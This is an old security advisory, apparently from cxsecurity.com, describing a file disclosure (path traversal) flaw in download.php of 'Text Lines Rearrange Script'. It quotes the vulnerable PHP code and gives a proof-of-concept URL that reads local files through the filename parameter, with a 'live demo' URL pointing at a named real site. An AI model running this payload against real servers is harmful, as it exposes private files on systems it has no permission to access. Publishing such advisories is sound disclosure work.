Text Lines Rearrange Script (filename) File Disclosure Vulnerability

2009-03-02 / 2009-03-03
Credit: SirGod
Risk: Low
Local: No
Remote: Yes
CWE: CWE-22


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: None
Availability impact: None

############################################################################################# [+] Text Lines Rearrange Script (download.php filename) File Disclosure Vulnerability [+] Discovered By SirGod [+] Visit : www.h4cky0u.org [+] Greetz : All my friends ############################################################################################# [+] File Disclosure Vulnerability Vulnerable Code in download.php : ----------------------------------------------------- if(file_exists($filename)) { $fp=fopen($filename,"r"); $content=fread($fp,filesize($filename)); fclose($fp); ------------------------------------------------------ PoC : http://[target]/[path]/download.php?filename=[Local File] Example : http://[target]/[path]/download.php?filename=index.php Live Demo : http://www.rightscripts.com/listrearrange/download.php?filename=index.php #############################################################################################


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top